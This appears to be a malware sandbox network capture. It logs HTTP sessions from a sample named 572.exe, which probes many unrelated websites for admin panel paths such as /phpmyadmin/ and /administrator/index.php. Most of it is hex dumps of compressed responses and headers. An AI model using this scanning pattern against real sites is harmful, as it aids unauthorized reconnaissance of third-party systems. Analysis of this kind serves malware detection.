                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:58 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"634e1b8f-1d60"
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 18 Oct 2022 03:20:47 GMT
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900801609501896148
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=EB8CC7650E617F0D35F2D5C2F1E7BC8D:FG=1; expires=Tue, 04-Feb-25 11:14:58 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900801609501896148
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0QMaTE=
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00 b6 d7 d0 c1 0f b1 96 a5 5b c4 9c 4e a4 0c 78 03 75 d1 04 93 c6 fc 7c 56 53 4c 59 60 79 45 52 b4 49 a4 65 d3 43 d1 13 23 c8 f9 1f 9e 42 ae f6 d1 08 34 36 3f 86 a7 98 24 8a 93 bc d7 00 fc 38 ab 8a 2e 1a a2 22 4f 22 76 22 a6 16 11 3b 36 ae 16 a7 a8 a2 48 3e 59 dd b9 55 5d bd 8f 3a b5 db ae b5 e6 dc 11 56 55 d6 d4 a4 96 24 41 d4 55 09 97 26
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/TaW(hX\$qE|:+"xdU hj4r"4)I9i$[ol:SN`AvZ69)IRY]%;Pc[[0<[Nxu|VSLY`yERIeC#B46?$8."O"v";6H>YU]:VU$AU&
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:58.983521938 CET1280INData Raw: 91 ac c8 64 ca 4f 81 ed ac 00 a7 41 17 be 0b a9 4d de d2 b9 24 22 90 30 ff 5e ea 4e 7a 6d c5 d9 32 1b 76 e2 ed a2 db 16 d3 50 4a 8b c0 57 37 be 48 0d 45 ce 16 4d 59 32 7b c3 a5 7e a3 83 e3 b4 c8 0f 0f 7a 7d f1 41 6d 7d c3 da b9 7b 00 f4 45 11 a2
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: dOAM$"0^Nzm2vPJW7HEMY2{~z}Am}{EOT @9o-@\ g9@IwxzZ}e09<V0\097yVr,+G}NK"?,DfI)Ms:z+$'AS\'
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:58.983537912 CET211INData Raw: d6 73 4a a1 03 4c 3f 70 83 51 99 46 6f 50 f4 ea 0e 8c a6 f3 1d 62 e9 15 0c 8e 5e 0d 7d f6 a3 c7 56 a9 b8 3f 7d 1e 73 e1 b4 eb c6 c3 f4 27 95 a1 8e d2 2f 33 c2 1c 3d 7d 02 ee 18 e3 06 b8 8f a5 e8 26 a9 c5 3e 1a 8d 02 ef 5f 78 47 34 7f 6a 08 d3 ca
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: sJL?pQFoPb^}V?}s'/3=}&>_xG4j>0@$~efi"c+T:d2v0Ao1[z^bpKZKWyD5G6gz9c\`
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:58.983553886 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:58.989308119 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:59.195375919 CET1280INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:58 GMT
                                                                                                                                                                                                                                                                                                                                                                Etag: W/"634e1b8f-1d60"
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 18 Oct 2022 03:20:47 GMT
                                                                                                                                                                                                                                                                                                                                                                Logid: 8900801609501896148
                                                                                                                                                                                                                                                                                                                                                                P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: BAIDUID=EB8CC7650E617F0D35F2D5C2F1E7BC8D:FG=1; expires=Tue, 04-Feb-25 11:14:58 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: BaiduCloud
                                                                                                                                                                                                                                                                                                                                                                Yld: 8900801609501896148
                                                                                                                                                                                                                                                                                                                                                                Yme: ZIGW/y8rX0QMaTE=
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 38 39 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 59 7b 6f db c8 11 ff bb 06 f2 1d f6 98 a8 b6 01 53 8c 2c 3b b5 6c 49 81 2e 76 d0 00 6d 1c b4 77 7d 20 08 8c 15 b9 92 18 53 24 cb 87 25 5d 71 80 71 69 12 3b b9 c4 0d f2 b8 5c ec 3c 7b 49 ef 9a c6 76 0f d7 c6 e7 c4 f1 87 39 51 8f bf ee 2b 74 96 94 64 52 a2 44 d9 71 48 5b 22 77 67 67 7e 3b 3b b3 33 3b 8a 7f 34 3d 7b ea 93 3f 9f 9b 41 39 23 2f 25 8f 0c c4 e9 37 92 b0 9c 4d 30 9f e5 d8 53 67 19 bb 91 60 81 7e e7 89 81 11 9f c3 9a 4e 8c 04 f3 e9 27 a7 d9 09 bb df 10 0d 89 24 eb 4f ff 5b 7f f8 ac bc 75 c3 7a 75 df 5a fb 36 ce 39 cd d0 2f 89 f2 3c ca 69 24 93 60 38 4e c5 72 38 8d 45 c1 0c f3 4a 9e 53 55 8d e8 9c 6e 60 43 e4 39 31 8f b3 f0 96 c1 0b 22 af c8 61 f8 60 90 46 a4 04 a3 e7 14 cd e0 4d 03 d1 76 a6 c5 d2 e9 33 4a 12 d1 73 84 18 0c 32 4a 2a 49 30 06 29 1a 1c af eb 4c 3f 32 81 8e 23 9a a6 68 73 58 92 c2 f0 76 d2 48 8c 1e 8f 44 8f 47 47 23 a3 b1 e8 98 2d ed 23 96 3d 2f 66 90 64 a0 33 33 28 76 81 36 e9 bc 26 aa 86 5b e2 45 bc 80 9d 56 06 e9 1a 1f 20 f7 a2 ce a9 92 99 e5 a8 c2 c7 c3 17 75 26 19 e7 9c d1 b6 c0 f3 44 16 c4 cc 05 96 75 c9 72 98 b6 73 49 9b 9e 19 b4 73 ea 3e d6 c8 89 9a a0 62 cd 28 71 74 81 89 c6 e5 15 c1 94 c8 9c f3 06 9c 3a 54 e1 66 cc 35 ad 22 ad 08 25 c4 4b 58 d7 13 8c 8d 83 1d 3b ee a8 4d 10 17 90 28 24 18 41 e1 e7 f2 58 b4 57 0e c1 15 77 24 34 07 e5 04 96 f6 c2 2b c1 5a 46 2c 32 f6 20 87 a6 39 c4 1e 86 9b 23 32 2c 35 04 56 52 b2 0a a2 1f 7b 2b 5d 32 5d 1a 67 50 31 2f c9 54 82 61 a8 93 1c 57 28 14 c2 85 68 58 d1 b2 5c 24 16 8b 71 45 aa 7c 3a 2b ec 96 22 e3 85 a6 1c 78 d4 fb 64 b2 c7 c0 0b 55 20 19 d6 e6 68 6a 1a 91 c1 34 72 22 34 29 bc 49 39 c2 e3 69 fa d8 c2 cf 24 cb 5b 6f c0 91 bc 90 6c 8e 3a 18 53 93 a9 4e 60 dd b0 41 ec 15 81 f6 76 5a aa f8 36 f9 39 ac b3 aa 29 49 82 52 90 59 5d 25 bc 88 3b 50 db 63 5b c8 5b d4 30 3c 00 b6 d7 d0 c1 0f b1 96 a5 5b c4 9c 4e a4 0c 78 03 75 d1 04 93 c6 fc 7c 56 53 4c 59 60 79 45 52 b4 49 a4 65 d3 43 d1 13 23 c8 f9 1f 9e 42 ae f6 d1 08 34 36 3f 86 a7 98 24 8a 93 bc d7 00 fc 38 ab 8a 2e 1a a2 22 4f 22 76 22 a6 16 11 3b 36 ae 16 a7 a8 a2 48 3e 59 dd b9 55 5d bd 8f 3a b5 db ae b5 e6 dc 11 56 55 d6 d4 a4 96 24 41 d4 55 09 97 26
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 89aY{oS,;lI.vmw} S$%]qqi;\<{Iv9Q+tdRDqH["wgg~;;3;4={?A9#/%7M0Sg`~N'$O[uzuZ69/<i$`8Nr8EJSUn`C91"a`FMv3Js2J*I0)L?2#hsXvHDGG#-#=/fd33(v6&[EV u&DursIs>b(qt:Tf5"%KX;M($AXWw$4+ZF,2 9#2,5VR{+]2]gP1/TaW(hX\$qE|:+"xdU hj4r"4)I9i$[ol:SN`AvZ69)IRY]%;Pc[[0<[Nxu|VSLY`yERIeC#B46?$8."O"v";6H>YU]:VU$AU&
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:59.362777948 CET216INData Raw: d6 73 4a a1 03 4c 3f 70 83 51 99 46 6f 50 f4 ea 0e 8c a6 f3 1d 62 e9 15 0c 8e 5e 0d 7d f6 a3 c7 56 a9 b8 3f 7d 1e 73 e1 b4 eb c6 c3 f4 27 95 a1 8e d2 2f 33 c2 1c 3d 7d 02 ee 18 e3 06 b8 8f a5 e8 26 a9 c5 3e 1a 8d 02 ef 5f 78 47 34 7f 6a 08 d3 ca
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: sJL?pQFoPb^}V?}s'/3=}&>_xG4j>0@$~efi"c+T:d2v0Ao1[z^bpKZKWyD5G6gz9c\`0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                313192.168.2.65809876.223.26.9680524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.599049091 CET287OUTGET /administrator/index.php?usid=27&utid=4923801494 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ww12.chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ww1.chainmine.io/administrator/?usid=27&utid=4923801068
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.882478952 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_ktrZ201JKoTGYoBocaaOC5ebocGSGMw0PfyGyKijQLyeCXHy6WvbckR213lhKuIIKKhMDBcG1o0BnGGFbX643Q==
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: dpr
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: device-memory
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: rtt
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: downlink
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: ect
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: ua
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: ua-model
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                                                                                                Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                                                                                                X-Domain: chainmine.io
                                                                                                                                                                                                                                                                                                                                                                X-Subdomain: ww12
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 64 30 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 e5 5b 79 73 da ca 96 ff fb f9 53 28 a4 c6 82 b9 20 90 f0 8e e5 0c 36 78 4b c0 1b 59 20 95 49 09 a9 01 19 21 71 25 61 96 fb fc dd e7 77 ba 25 21 30 ce bb 79 75 73 a7 a6 86 54 40 ea e5 9c d3 a7 cf de ed e3 37 b5 9b b3 56 fb b6 2e 0d c2 91 73 b2 75 4c 3f 92 65 84 46 c1 b0 ba 8e 67 0e 87 6c ae 67 1a e7 d3 69 ed ae 7d fd de eb 5c 0d 9e cc 66 f5 ae 7e 7a 7a 57 ad 3d 4c ab d3 87 ea f5 69 f5 c3 ef 93 da 79 bd f5 e5 de 2d 5d fa a5 dd de c7 db fd fa 75 6b 7f 7f d6 76 6f 47 f7 dd 71 63 be f3 34 3c 78 df b6 2f dd 61 73 cc 2c f7 f1 a6 da bc 36 8d 2f b5 2f e6 fb bb eb 66 c9 fd f2 be 73 fd 61 bf 65 da d7 b5 83 aa 77 f9 e5 bd ba 7b 70 56 9d d6 ab d5 3b 5d ff 3e 0c fd 8e 56 52 41 40 eb a2 ed 9d 7a a6 61 dc 9c ed b2 ae 67 5e 3c 5c 34 a6 a5 db de fc 62 fe de 7e bc fb 30 67 67 5f 2e e7 7b 9f 9f ba e6 f0 5e 53 cb ce e0 fd e4 ea ea fd fb 41 a3 76 6a 5e a8 5e e9 d4 bd b8 38 ef 7e d9 db 29 03 70 46 9a 8d 1c 37 d0 33 83 30 1c 1f 15 8b d3 e9 54 99 96 15 cf ef 17 d5 c3 c3 c3 e2 8c f8 91 91 1c c3 ed eb 19 e6 66 88 43 cc b0 4e b6 24 7c 8e 47 2c 34 c0 b8 70 5c 60 bf 4f ec 27 3d 73 e6 b9 21 73 c3 42 6b 3e 66 19 c9 14 6f 7a 26 64 b3 b0 48 90 2a 92 39 30 fc 80 85 fa 24 ec 15 0e 32 c5 34 20 d7 18 31 3d f3 64 b3 e9 d8 f3 c3 d4 f4 a9 6d 85 03 dd 62 4f b6 c9 0a fc 25 2f d9 ae 1d da 86 53 08 4c c3 61 ba 9a 97 82 81 6f bb c3 42 e8 15 7a 76 a8 bb 5e 02 3b b4 43 87 9d 00 af ed 8e 6c 97 29 b6 77 5c 14 6d 62 11 41 38 77 98 34 62 96 6d e8 99 c0 f4
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: d06[ysS( 6xKY I!q%aw%!0yusT@7V.suL?eFglgi}\f~zzW=Liy-]ukvoGqc4<x/as,6//fsaew{pV;]>VRA@zag^<\4b~0gg_.{^SAvj^^8~)pF730TfCN$|G,4p\`O'=s!sBk>foz&dH*90$24 1=dmbO%/SLaoBzv^;Cl)w\mbA8w4bm
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.882529020 CET1286INData Raw: 19 5f a6 62 04 20 f3 7b 10 1a 7e 49 fa 63 eb 1f 5d c3 1c f6 7d 6f e2 5a 47 d2 c4 77 b2 72 b1 68 95 0f c6 81 ef da ea 7e f7 69 36 51 4c c7 9b 58 3d 1f 6b 56 5c 16 16 c3 01 1b b1 a0 c8 c1 04 45 0e 47 e9 db 3d 39 27 b9 5e c1 67 63 66 84 92 09 5e 31
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: _b {~Ic]}oZGwrh~i6QLX=kV\EG=9'^gcf^1#I-gx0?W1?,"RT%=2pwH~a0a7#d4kC{bv'FIU3=X<29?1:29RBvK
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.882569075 CET1286INData Raw: 47 d2 16 4e 02 7d ce 02 f4 7a 8e 68 95 73 f0 45 e6 24 c8 e6 90 a1 0a 21 59 45 15 ad fe 56 d0 23 dd 72 fc 50 1c 03 b9 73 6a 8d cb 47 62 64 c4 d7 e8 67 2b 56 88 57 34 80 d2 f1 09 64 5c cf 5c 43 2f 1e b8 f2 44 68 9f 0c 5f 0a 4d 1e a4 4b 7a e4 5c 08
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: GN}zhsE$!YEV#rPsjGbdg+VW4d\\C/Dh_MKz\A^#Iz"'B-S`|$){N3e"Z}HkF(=[$A|PJ$KtdKDI/h=1,PK0;ow'/iQZqw9*(N!]&5#D0s8<=$^-
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.882608891 CET278INData Raw: bc 65 f4 c9 27 64 65 bb e7 e3 57 ce 7d 2d 7d e3 12 09 90 24 4a d7 0f 37 4d 4a a9 02 96 05 02 85 14 4c 09 26 dd 20 f4 f9 bb 6d 29 0e df 65 e8 90 9a cb 41 d1 a5 2c 39 79 af 27 11 80 af 34 c7 b6 be 29 d4 26 e9 ba 94 c1 44 b8 98 8c b4 bd fd ca 80 95
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e'deW}-}$J7MJL& m)eA,9y'4)&D2F+RvkW65WyI`ch,CAqS%gp6`le0}b"m9%R(R(Ga5;lQJ6z6\#SfAMM?.76/SL-w4x
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.882647991 CET1286INData Raw: 37 63 61 0d 0a 2b 06 92 1b 7f 65 18 17 40 21 35 76 6f 9e 25 e6 e6 f8 ae e6 e5 97 c6 35 a5 6a 52 d6 47 92 03 17 54 35 4d 36 a6 33 18 24 3a 94 c4 61 97 12 25 a1 42 85 c2 eb 13 ca b2 3c 81 bd 93 f9 1b d2 04 9c 00 fc c8 80 93 b9 e3 32 9f 15 b0 95 9e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7ca+e@!5vo%5jRGT5M63$:a%B<2a;N?a^2IuTmeW<-G*azw.iXwj{H4MHpR}f{($RrN8V&hhK_sBM_Io$aTyI=f7,WP(r$d
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.882688999 CET720INData Raw: 98 8b d3 1f 8a 90 94 00 c7 05 00 8e 2a 67 16 57 9b c5 01 08 91 e0 b9 44 3b 26 24 6b 89 d7 40 a4 45 34 81 1e 54 10 88 37 81 72 66 f4 2a c1 d4 e6 f5 60 23 aa 5d c3 6f 98 38 07 91 d4 a3 28 22 20 37 64 66 0d 94 c2 73 15 de a3 bd ec 41 f1 fe ab 1a f7
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: *gWD;&$k@E4T7rf*`#]o8(" 7dfsA_QZ<jhl9g Swt<@:RETGO*tt",~%Z#PxSG?Effwy`D$FfO+\X4V#Yv#xHJ(&pQc,U%
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.887888908 CET720INData Raw: 98 8b d3 1f 8a 90 94 00 c7 05 00 8e 2a 67 16 57 9b c5 01 08 91 e0 b9 44 3b 26 24 6b 89 d7 40 a4 45 34 81 1e 54 10 88 37 81 72 66 f4 2a c1 d4 e6 f5 60 23 aa 5d c3 6f 98 38 07 91 d4 a3 28 22 20 37 64 66 0d 94 c2 73 15 de a3 bd ec 41 f1 fe ab 1a f7
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: *gWD;&$k@E4T7rf*`#]o8(" 7dfsA_QZ<jhl9g Swt<@:RETGO*tt",~%Z#PxSG?Effwy`D$FfO+\X4V#Yv#xHJ(&pQc,U%


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                314192.168.2.658149172.66.41.2080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:01.834933043 CET178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: www.yellosa.co.za
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                315192.168.2.65829134.149.46.13080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:07.474234104 CET182OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:07.577054024 CET211INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                316192.168.2.65828864.190.63.11180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:07.925204039 CET168OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: foros.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:08.134255886 CET88INHTTP/1.1 439
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:15:08 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                server: NginX


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                317192.168.2.65829845.60.74.5080524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:07.925297022 CET196OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zuhauseplus.vodafone.de
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:15:23.109544992 CET1232INHTTP/1.1 503 Service Unavailable
                                                                                                                                                                                                                                                                                                                                                                Retry-After: 5
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 18-7271493-0 NNNN RT(1707131707144 2) q(0 0 -1 -1) r(150 -1) b6 U5
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: visid_incap_2490076=kLeaQSZ1RB6mANP3fttPzErDwGUAAAAAQUIPAAAAAAC8rGzozAqaKHOHbzumengl; expires=Mon, 03 Feb 2025 22:24:35 GMT; HttpOnly; path=/; Domain=.vodafone.de
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: incap_ses_9117_2490076=tGTdAjvxwnSj8Hr7LxiGfkrDwGUAAAAAgu2NC6fgHpmbmxBlXbXLHw==; path=/; Domain=.vodafone.de
                                                                                                                                                                                                                                                                                                                                                                X-CDN: Imperva
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 13-6888818-6889272 nNYN RT(1707131705768 2156) q(0 0 0 -1) r(150 150) b6 U22
